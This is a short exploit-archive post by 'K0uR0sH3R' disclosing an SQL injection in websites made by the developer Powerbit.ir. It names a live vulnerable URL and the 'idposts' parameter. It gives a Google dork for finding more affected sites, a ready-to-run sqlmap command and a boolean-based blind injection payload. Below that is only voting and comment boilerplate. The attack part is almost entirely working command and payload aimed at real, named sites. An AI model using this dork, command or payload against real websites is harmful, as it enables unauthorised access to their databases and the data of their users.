Powerbit.ir Web developer Sql injection

2021.04.15

K0uR0sH3R (DE)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Powerbit.ir SQL Injection Vulnerability
# Author: K0uR0sH3R
# Date: 15/04/2021
# Tested On: Kali Linux
# Contact: https://t.me/K0uR0sH3R
# Google Dork: intext:"کلیه ی حقوق این وب سایت متعلق به پاوربیت می باشد."
----------------------------------------------------------------------------------------------------

# Vulnerable Path: http://powerbit.ir/postDetails?idposts=test

# python3 sqlmap.py -u "http://powerbit.ir/postDetails?idposts=test" -p "idposts" --risk="3" 


---
Parameter: idposts (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: idposts=-9146 OR 6723=6723
---

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Powerbit.ir Web developer Sql injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Powerbit.ir Web developer Sql injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.